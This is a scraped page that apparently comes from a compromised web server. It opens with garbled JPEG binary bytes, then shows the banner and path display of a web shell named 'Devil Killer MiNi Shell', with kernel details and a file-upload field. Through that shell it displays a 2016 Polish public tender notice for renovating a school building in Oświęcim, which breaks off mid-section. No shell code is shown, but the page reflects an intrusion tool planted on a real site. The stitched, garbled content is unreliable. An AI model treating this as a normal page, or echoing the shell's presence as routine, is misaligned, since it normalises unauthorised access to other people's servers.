JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160523/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160523/57377-N-2016.html

<p class="kh_header"><b>Oświęcim: Modernizacja przewiązki szkoły PZ nr 1 w Oświęcimiu</b><br>
<b>Numer ogłoszenia: 57377 - 2016; data zamieszczenia: 23.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Oświęcimski - Starostwo Powiatowe w Oświęcimiu , ul. Wyspiańskiego 10, 32-602 Oświęcim, woj. małopolskie, tel. (033) 8449600, faks (033) 8449619.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.oswiecim.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja przewiązki szkoły PZ nr 1 w Oświęcimiu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych w ramach zadania inwestycyjnego pn. Modernizacja przewiązki szkoły PZ Nr 1 w Oświęcimiu.

Zamawiający jest w posiadaniu dokumentacji projektowej. 

Zakres robót objęty zamówieniem: 
I. Termomodernizacja budynku (przewiązki).
Izolacja termiczna ścian:Zabezpieczenie otworów okiennych i drzwiowych folią i taśmą malarską;	Demontaż krat okiennych; Rozebranie obróbek blacharskich parapetów z blachy powlekanej z późniejszym montażem nowych; Demontaż betonowych parapetów zewnętrznych; Skucie węgarków i odparzonych tynków;Demontaż blachy z podkonstrukcją z łat drewnianych;	Demontaż rur spustowych z późniejszym montażem nowych;Demontaż rynien z późniejszym montażem nowych;Demontaż przewodów odgromowych mocowanych na wspornikach w ścianie z późniejszym montażem nowych w rurach winidurowych; Demontaż istniejących elementów z ponownym montażem takich jak: lampy, kamery, itp.; Demontaż istniejącego zadaszenia z blachy stalowej na wspornikach;	Demontaż istniejących wsporników stalowych zadaszenia;	Skucie i uzupełnienie odparzonych tynków;Wykonanie bruzd w ścianach pod rury winidurowe; Przygotowanie podłoża pod ocieplenie metodą lekką - mokrą, czyszczenie mechaniczne i zmycie ścian zewnętrznych; Izolacja termiczna ścian; Tynkowanie; Montaż płytek klinkierowych ze spoinowaniem.

Izolacja termiczna ścian fundamentowych i cokołów: Demontaż warstwy asfaltowej, montaż opaski żwirowej; Demontaż opaski z płyt chodnikowych 50x50cm, montaż opaski żwirowej; Roboty ziemne - wykop odcinkami dla odsłonięcia ścian fundamentowych i późniejszy zasyp;	Demontaż starej hydroizolacji/izolacji; Demontaż i ponowny montaż uziemienia (otoku); Demontaż i ponowny montaż nowych rur spustowych z czyszczakami; Skucie odparzonych tynków cokołu; Skucie nierówności na ścianach fundamentowych; Osuszanie i odgrzybianie fragmentów ścian tego wymagających;	Tynkowanie - wyrównanie powierzchni ścian fundamentowych; Montaż hydroizolacji z podkładem;	Montaż izolacji termicznej z warstwa osłonową - folia kubełkowa;Montaż nowych rur spustowych; Wpięcie rury spustowej do Kd.

Remont kominów:	Demontaż betonowych czapek kominowych z późniejszym montażem nowych;	Demontaż obróbek blacharskich; Demontaż kominowych kanałów wentylacyjnych podlegających remontowi; Odtworzenie kominowych kanałów wentylacyjnych z cegły klinkierowej; Montaż siatek przeciw ptakom.

Izolacja termiczna stropodachów: Demontaż przewodów odgromowych z późniejszym montażem nowych;Demontaż rynien z późniejszym montażem nowych; Rozebranie obróbek blacharskich z późniejszym montażem nowych; Remont ścianki attykowej i okapu dachu; Czyszczenie i przygotowanie podłoża; Montaż styropapy z obróbką kominów papą i ścian przyległych.

Wymiana stolarki okiennej i drzwiowej:  Demontaż stolarki okiennej i drzwiowej; Montaż nowych okien PCV;	Montaż nowych okien - aluminium ocieplone; 	Przełożenie istniejących drzwi wejściowych; Demontaż parapetów wewnętrznych; Remont ścian pod oknami; Tynkowanie;  Malowanie; Uzupełnienie posadzki.

Remont istniejących schodów z pochylnią: Demontaż istniejących płytek; Demontaż istniejących wylewek; Demontaż okładzin betonowych; Demontaż istniejących balustrad;	Montaż nowych wylewek; Montaż nowych płytek, Montaż nowych balustrad ze stali nierdzewnej;	Montaż wpustów odwadniających; Montaż wycieraczki.

II. Prace konserwacyjne pomieszczeń przewiązki.
Prace konserwacyjne pomieszczeń - Parter: Wymiana balustrady pomiędzy oknami na nową (stal malowana proszkowo) - pom. P0/05; Wykonanie tynków cienkowarstwowych mozaikowych do wysokości 1,6m (kolorystyka w uzgodnieniu z Dyrekcją szkoły) - pom. P0/05; Wykonanie dylatacji na klatce schodowej - pom. K3; Rozebranie wykładziny ściennej w ilości ok. 4m2, rozebranie ścianki działowej z płyt gipsowo - kartonowych na pojedynczym ruszcie metalowym, pokrytym jednostronnie płytą w ilości ok. 4,8m2 wraz z ponownym ich odtworzeniem; Zerwanie istniejącej posadzki - pom. P0/05; Przygotowanie podłoża oraz wykonanie posadzki z płytek układanych na kleju wraz z cokołami (rozmiar płytek, kolorystyka w uzgodnieniu z Dyrekcją szkoły) - pom. P0/05;Przecieranie istniejących tynków, przygotowanie podłoża, gruntowanie pod malowanie - wszystkie pomieszczenia;	Malowanie farbami emulsyjnymi sufitów i ścian wewnętrznych - wszystkie pomieszczenia, Zabezpieczenie folią podłóg - wszystkie pomieszczenia; Mycie po robotach budowlanych; Usunięcie zawilgoceń na podwieszanych sufitach w pomieszczeniach sanitarnych; Wywóz gruzu z terenu budowy na składowisko wraz z opłatą za przyjęcie odpadu.

Prace konserwacyjne pomieszczeń - Piętro: Demontaż wentylatorowni - pom. P1/07; Skucie fundamentu pod wentylatorownię - pom. P1/07; Skucie tynku wewnętrznego wraz z wykonaniem nowego w ilości ok. 1m2; Wykucie z muru ościeżnic drewnianych (szt. 6) oraz ościeżnic stalowych (szt. 4); Wykucie z muru kratek wentylacyjnych wraz z montażem nowych (szt. 3);	Rozebranie wykładziny ściennej z płytek wraz z wykonaniem tynków zwykłych w miejscu ich rozebrania - pom. P1/04;	Rozebranie wykładziny ściennej z płytek wraz z wykonaniem na nowo okładziny ściennej z płytek (rozmiar płytek, kolorystyka w uzgodnieniu z Dyrekcją szkoły) - pom. P1/05; Ługowanie farby olejnej - pom. K3, P1/08;	Wykonanie tynków cienkowarstwowych mozaikowych do wysokości 1,6m (kolorystyka w uzgodnieniu z Dyrekcją szkoły) - pom. K3, P1/08; Rozebranie posadzek (tworzywa sztuczne, lastryko) - wszystkie pomieszczenia;	Przygotowanie podłoża oraz wykonanie posadzki z płytek układanych na kleju wraz z cokołami (rozmiar płytek, kolorystyka w uzgodnieniu z Dyrekcją szkoły) - wszystkie pomieszczenia łącznie z klatką schodową;	Dostawa wraz z montażem drzwi płytowych wewnętrznych wraz z ościeżnicami drewnianymi (8 drzwi z tego 2 z kratką wentylacyjną);	Wykonanie balustrady na klatce schodowej z profili stalowych malowanych proszkowo - pom. K3;	Przecieranie istniejących tynków, przygotowanie podłoża, gruntowanie pod malowanie - wszystkie pomieszczenia;	Malowanie farbami emulsyjnymi sufitów i ścian wewnętrznych - wszystkie pomieszczenia,	Zabezpieczenie folią podłóg - wszystkie pomieszczenia; Mycie po robotach budowlanych; Malowanie farbą olejną elementów metalowych wraz z szpachlowaniem w ilości ok. 1,8m2;	Wywóz gruzu z terenu budowy na składowisko wraz z opłatą za przyjęcie odpadu.

III. Remont instalacji sanitarnych (przewiązki).
Instalacja wodno - kanalizacyjna, centralnego ogrzewania oraz wentylacyjna: Prace demontażowe i pośrednie;	Remont instalacji centralnego ogrzewania;	Remont instalacji wodnej;	Remont instalacji kanalizacyjnej;	Remont instalacji wentylacyjnej.

IV. Przebudowa instalacji elektrycznych (przewiązki).
Wewnętrzna instalacja elektryczna:	Wykonanie rozdzielnicy głównej TG oraz tablicy rozdzielczej zasilania przewiązki T0.4;	Wykonanie instalacji oświetlenia podstawowego i ewakuacyjnego;	Wykonanie instalacji gniazd wtyczkowych ogólnego przeznaczenia i gniazd komputerowych;	Wykonanie instalacji słaboprądowej i dzwonkowej;	Wykonanie instalacji odgromowej i uziemienia.

Szczegółowy opis przedmiotu zamówienia określa:
a) dokumentacje projektowe (projekty wykonawcze), 
b) przedmiary robót (poglądowe, nie służące do wykonania kosztorysu ofertowego. Ilości obmiarowe są ilościami przybliżonymi, uśrednionymi i mogą różnić się od ilości rzeczywistych),
c) specyfikacje techniczne wykonania i odbioru robót,
d) audyt energetyczny budynku.

UWAGA!
Z uwagi na fakt, że budynek jest obiektem funkcjonującym wszystkie roboty tzw. głośne czyli przekucia, rozbiórki itp. należy wykonywać w uzgodnieniu z Dyrekcją Powiatowego Zespołu Nr 1 w Oświęcimiu.

Jeżeli dokumentacja projektowa, przedmiary robót lub specyfikacja techniczna wykonania i odbioru robót wskazywałaby w odniesieniu do niektórych materiałów i urządzeń znaki towarowe lub pochodzenie zamawiający, zgodnie z art. 29 ust. 3 ustawy Pzp, dopuszcza składanie produktów równoważnych. Wszelkie produkty pochodzące od konkretnych producentów, określają minimalne parametry jakościowe  i cechy użytkowe, jakim muszą odpowiadać towary, aby spełnić wymagania stawiane przez zamawiającego  i stanowią wyłącznie wzorzec jakościowy przedmiotu zamówienia. Poprzez zapis dotyczący minimalnych wymagań parametrów jakościowych, zamawiający rozumie wymagania towarów zawarte w ogólnie dostępnych źródłach, katalogach, stronach internetowych producentów. Operowanie przykładowymi nazwami producenta, ma jedynie na celu doprecyzowanie poziomu oczekiwań zamawiającego w stosunku do określonego rozwiązania. Tak więc posługiwanie się nazwami producentów produktów ma wyłącznie charakter przykładowy. Zamawiający, przy opisie przedmiotu zamówienia, wskazując oznaczenie konkretnego producenta (dostawcy) lub konkretny produkt, dopuszcza jednocześnie produkty równoważne o parametrach jakościowych i cechach użytkowych, co najmniej na poziomie parametrów wskazanego produktu, uznając tym samym każdy produkt o wskazanych parametrach lub lepszych. W takiej sytuacji zamawiający wymaga złożenia stosownych dokumentów, uwiarygodniających te materiały lub urządzenia. Będą one podlegały ocenie autora dokumentacji projektowej, który sporządzi stosowną opinię. Opinia ta będzie podstawą do podjęcia decyzji o akceptacji równoważników lub odrzuceniu oferty z powodu ich nierównoważności.

Warunki realizacji robót.
Warunki realizacji robót określa wzór umowy stanowiący załącznik do SIWZ. 
Zamawiający dokonał zgłoszenia zamiaru wykonania robót budowlanych w dniu 29.04.2014 r. - dotyczy zakresu termomodernizacji. Pozostałe prace budowlane i konserwacyjne nie wymagają uzyskania pozwolenia na budowę oraz dokonania zgłoszenia zamiaru wykonywania robót budowlanych.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.00.00-2, 45.21.42.00-2, 45.21.42.20-8, 45.45.30.00-7, 45.42.11.30-4, 45.26.25.00-6, 45.41.00.00-4, 45.43.00.00-0, 45.44.21.00-8, 45.30.00.00-0, 45.31.12.00-2, 45.31.73.00-5, 45.31.43.20-0, 45.31.42.00-3, 45.31.40.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wykonawca przed upływem terminu składania ofert zobowiązany jest wnieść wadium w wysokości:             5.000,00 zł (słownie: pięć tysięcy złotych 00/100).
2.	Wadium może być wnoszone:
- przelewem - wpłacane na rachunek Starostwa Powiatowego  w Oświęcimiu prowadzony przez ABS Bank Spółdzielczy, Andrychów  ul. Krakowska 112;  nr 43 8110 1023 2003 0312 0001 0037                  z dopiskiem wadium - SZP.272.14.2016 i nazwą Wykonawcy - tak, aby przed upływem terminu składania ofert wadium znajdowało się na ww. rachunku.
- w poręczeniach bankowych, poręczeniach pieniężnych spółdzielczej kasy oszczędnościowo-
kredytowej, gwarancjach bankowych, gwarancjach ubezpieczeniowych lub poręczeniach                                                                                                                                                                                                                                                                                                                                                                                                                                                         udzielanych przez podmioty o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada                
2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42,                 poz. 275 z późn. zm.) - składane w oryginale w Starostwie Powiatowym w Oświęcimiu, ul. Wyspiańskiego 10, Wydział Finansowy - pok. 217, II piętro, za potwierdzeniem przyjęcia przed upływem terminu składania ofert lub załączone do oferty (tj. w kopercie z ofertą, w takim przypadku zamawiający przekaże oryginał dokumentu stanowiącego wadium do Wydziału Finansowego).
3.	Wadium wnoszone w formie gwarancji i poręczeń musi spełniać następujące wymogi:
- być wystawione na Powiat Oświęcimski - Starostwo Powiatowe w Oświęcimiu                                 (32-602 Oświęcim, ul. St. Wyspiańskiego 10),
- zawierać w swojej treści oświadczenie gwaranta (poręczyciela), w którym zobowiązuje się on do bezwarunkowej wypłaty kwoty wadium na pierwsze żądanie zamawiającego zawierające oświadczenie, iż zaszła jedna z przesłanek wymienionych w art. 46 ust. 4a i 5 Pzp,
- okres ważności wadium nie może być krótszy niż okres związania ofertą.
4.	 Zamawiający zwróci wadium w sposób odpowiadający formie wnoszenia w przypadkach wymienionych w art. 46 ust 1, 1a, 2 oraz 4 Pzp. 
   Zamawiający zatrzyma wadium w przypadku, gdy zajdzie jedna z okoliczności wymienionych              w art. 46 ust. 4a lub 5 Pzp.
5.	 Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1, jeżeli w wyniku ostatecznego rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca złoży oświadczenie (na formularzu wg wzoru określonego w załączniku nr 2 do SIWZ) o spełnianiu warunków udziału w postępowaniu określonych odpowiednio w art. 22. ust 1 pkt 1-4 Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca:
1)	złoży oświadczenie (na formularzu wg wzoru określonego w załączniku nr 2 do SIWZ)                        o spełnianiu warunków udziału w postępowaniu określonych odpowiednio w art. 22. ust 1 pkt 1-4 Pzp.
2)	wykaże (na formularzu wg wzoru określonego w załączniku nr 4 do SIWZ), że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej jedną robotę budowlaną o wartości  co najmniej 250.000,00 zł brutto, porównywalną do przedmiotu zamówienia. 
Fakt wykonania robót musi być potwierdzony dowodami (poświadczeniami), określającymi czy roboty zostały wykonane w sposób należyty oraz wskazującymi, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać     w/w poświadczeń, powinien załączyć do oferty inne dokumenty.
W przypadku gdy zamawiający jest podmiotem, na rzecz którego roboty budowlane określone               w wykazie robót budowlanych (załącznik nr 4 do SIWZ) zostały wcześniej wykonane, wykonawca nie ma obowiązku przekładania dowodów z których będzie wynikało, że wymienione roboty budowlane zostały wykonane w sposób należyty oraz zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca złoży oświadczenie (na formularzu wg wzoru określonego w załączniku nr 2 do SIWZ) o spełnianiu warunków udziału w postępowaniu określonych odpowiednio w art. 22. ust 1 pkt 1-4 Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca na potwierdzenie, że dysponuje:
- osobą, która będzie uczestniczyć w wykonywaniu zamówienia, posiadającą uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej. Osoba ta będzie Kierownikiem Budowy,
- osobą, która będzie uczestniczyć w wykonywaniu zamówienia, posiadającą uprawnienia budowlane w specjalności instalacyjnej w zakresie instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,- osobą, która będzie uczestniczyć w wykonywaniu zamówienia, posiadającą uprawnienia budowlane w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
złoży:
- oświadczenie (na formularzu wg wzoru określonego w załączniku nr 2 do SIWZ) o spełnianiu warunków udziału w postępowaniu określonych odpowiednio w art. 22. ust 1 pkt 1-4 Pzp,
- oświadczenie na formularzu ofertowym (załącznik nr 1 do SIWZ - pkt 5).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca złoży oświadczenie (na formularzu wg wzoru określonego w załączniku nr 2 do SIWZ) o spełnianiu warunków udziału w postępowaniu określonych odpowiednio w art. 22. ust 1 pkt 1-4 Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pisemne zobowiązania innych podmiotów do udostępniania zasobów niezbędnych do realizacji zamówienia, jeżeli wykonawca, wskazując spełnienie warunków, o których mowa w art. 22 ust. 1 Pzp, polegał będzie na zasobach tych podmiotów na zasadach określonych w art. 26 ust 2b Pzp.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - okres gwarancji jakości przedmiotu umowy - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany i uzupełnienia treści umowy mogą być dokonywane wyłącznie w formie aneksu podpisanego przez obie strony, pod rygorem nieważności.
2. Istotne zmiany postanowień umowy w stosunku do treści oferty, na podstawie której  dokonano  wyboru Wykonawcy mogą dotyczyć zmiany terminu realizacji umowy w związku z:
a) koniecznością wprowadzenia zmian w dokumentacji projektowej, w szczególności wynikających             z konieczności dostosowania zakresu zadania do wytycznych programowych lub powszechnie obowiązujących przepisów prawa lub aktualizacji rozwiązań projektowych ze względu na postęp technologiczny,
b) brakiem możliwości rozpoczęcia realizacji umowy lub zaistnienia przerw w jej wykonaniu z przyczyn leżących po stronie Zamawiającego lub z przyczyn obiektywnych. Wówczas termin wykonania prac ulega przesunięciu o okres wynikający z przerw lub opóźnienia prac,
